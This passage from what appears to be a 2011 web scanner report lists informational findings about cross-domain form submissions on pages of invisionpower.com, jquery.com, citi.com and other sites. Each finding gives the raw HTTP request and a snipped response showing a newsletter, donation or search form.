Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=7e18e83c9fce99cef40adc0b7151471b; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNDQ3MLOuBVwwVf8GaA%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30617

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.6. http://jquery.com/demo/thickbox/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /demo/thickbox/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /demo/thickbox/ HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Oct 2009 17:03:07 GMT
ETag: "6039f1c-99fd-8dcc88c0"
Accept-Ranges: bytes
Content-Length: 39421
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</p>
       <form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick" />
...[SNIP]...

15.7. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ipboard+software&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base hr
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.8. http://www.asual.com/swfaddress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asual.com
Path:   /swfaddress/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /swfaddress/ HTTP/1.1
Host: www.asual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:45:32 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny9 with Suhosin-Patch
Set-Cookie: JSESSIONID=13FF2143CAF93EAC84619580631ADA51; Path=/
X-UA-Compatible: IE=8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12534

<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Creates open source software and provides profes
...[SNIP]...
</div>-->
<form id="donate" class="donate" method="post" action="https://www.paypal.com/cgi-bin/webscr">
<p>
...[SNIP]...

15.9. http://www.citi.com/domain/cm/js/branding.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/cm/js/branding.js

Issue detail

The page contains a form which POSTs data to the domain locations.citibank.com. The form contains the following fields:

Request

GET /domain/cm/js/branding.js HTTP/1.1
Host: www.citi.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 21:59:54 GMT
Content-length: 66481
Content-type: application/x-javascript
Last-modified: Fri, 28 Jan 2011 18:37:26 GMT
Etag: "103b1-4d430ce6"
Accept-ranges: bytes
Connection: close

if(typeof __son == 'undefined') {
var __son="Sign on My Citi";
var __soff="Sign off";
var __sonimg="signon.gif"
var __soffimg="signoff.gif"
var __help="Help";
var __oa="Open an Account";
var __
...[SNIP]...
<div id="find-flyout-main">'+
       '<form id="find-form" method="post" action="https://locations.citibank.com/citibankV2/prxInput.aspx" target="locations" onsubmit="if(searchLocations(\'find-form\')==false) return false;flyIn();return false;">'+
       '<div class="main">
...[SNIP]...

15.10. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enewspf.com
Path:   /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

Issue detail

The page contains a form which POSTs data to the domain enewspf.us2.list-manage.com. The form contains the following fields:

Request

GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1
Host: www.enewspf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
<div id="mc_embed_signup"><form action="http://enewspf.us2.list-manage.com/subscribe/post?u=16916704ed53b080dcd654c16&amp;id=4d58f0623e" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" style="font: normal 100% Arial, sans-serif;font-size: 10px;"><fieldset style="-moz-border-radius: 4px;border-radius: 4px;-webkit-border-radius: 4px;border: 1px solid #ccc;padding-top: 1.5em;margin: .5em 0;background-color: #fff;color: #000;text-align: left;">
...[SNIP]...

15.11. http://www.invisionpower.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=d81109a5732c5f664e1ff55df68064c9; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:18 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17127

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.12. http://www.invisionpower.com/ccs_forums_install/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /ccs_forums_install/index.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /ccs_forums_install/index.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:16:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=62069cbd0ecbb575710b82c9c798f366; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-
...[SNIP]...
</span>
                           <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                               <fieldset>
...[SNIP]...

15.13. http://www.invisionpower.com/company/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/contact.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /company/contact.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=cce78ef272198dcc830c2cd1d7562812; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17404

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.14. http://www.invisionpower.com/company/faq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/faq.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /company/faq.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=602d4859de7737e5dc06c5d00617fdda; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13568

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.15. http://www.invisionpower.com/company/mailing_list_error.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/mailing_list_error.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /company/mailing_list_error.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=83f6466b767762814768a9f4a4876663; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11798

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.16. http://www.invisionpower.com/company/mailing_list_thanks.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/mailing_list_thanks.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /company/mailing_list_thanks.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=650d790757d985d739c7fc9ca7c14d3a; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11756

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.17. http://www.invisionpower.com/company/standards.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/standards.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /company/standards.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=bdb42cb055af798f824b8b740a7f516c; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25404

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.18. http://www.invisionpower.com/hosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /hosting/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /hosting/ HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=1b022260e94ae0b3c3088d74565094f9; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15756

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.19. http://www.invisionpower.com/hosting/advanced.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /hosting/advanced.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /hosting/advanced.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=3c40be2780ee9ca906ef9571f3cc3f15; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20526

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.20. http://www.invisionpower.com/hosting/status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /hosting/status.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /hosting/status.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=616fd5fb0e0ab986e47d1514eeb90d57; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12127

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.21. http://www.invisionpower.com/legal/hosting_policies.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /legal/hosting_policies.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /legal/hosting_policies.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=53491a1ca390cc4565e43866ebd27da0; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 22587

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.22. http://www.invisionpower.com/legal/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /legal/privacy.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Request

GET /legal/privacy.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
